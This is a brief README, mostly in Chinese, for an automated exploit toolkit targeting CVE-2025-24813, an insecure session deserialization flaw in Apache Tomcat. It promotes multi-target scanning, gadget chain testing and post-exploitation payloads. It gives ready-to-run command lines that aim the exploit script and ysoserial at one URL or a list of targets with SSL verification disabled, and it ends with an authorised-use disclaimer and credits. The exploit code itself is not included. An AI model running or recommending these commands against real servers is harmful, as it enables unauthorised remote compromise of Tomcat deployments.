
针对 CVE-2025-24813 的自动化利用工具包,目标是 Apache Tomcat 的不安全会话反序列化漏洞。具备多目标扫描、gadget 链测试、操作系统检测以及后渗透载荷功能。
这是一个针对 CVE-2025-24813 的先进自动化利用工具,旨在攻击存在不安全会话反序列化漏洞的 Apache Tomcat 服务器。
--targets / --url)# Single target
python3 exploit_cve_2025_24813.py \
--url http://target:8080 \
--ysoserial ysoserial.jar \
--no-ssl-verify
# Multiple targets from file
python3 exploit_cve_2025_24813.py \
--targets targets.txt \
--ysoserial ysoserial.jar \
--no-ssl-verify
Python 3.6+
Java Runtime (for ysoserial)
ysoserial Java binary
此工具仅用于教育和授权安全测试目的。严禁对您不拥有或未经明确许可测试的系统进行任何未经授权的使用,此类行为可能违法。
📚 致谢
本项目灵感来源于根据 Apache License 2.0 发布的一个公开 PoC。 原始 PoC 作者:absholi7ly 由 mehrdad mirabi 增强并重写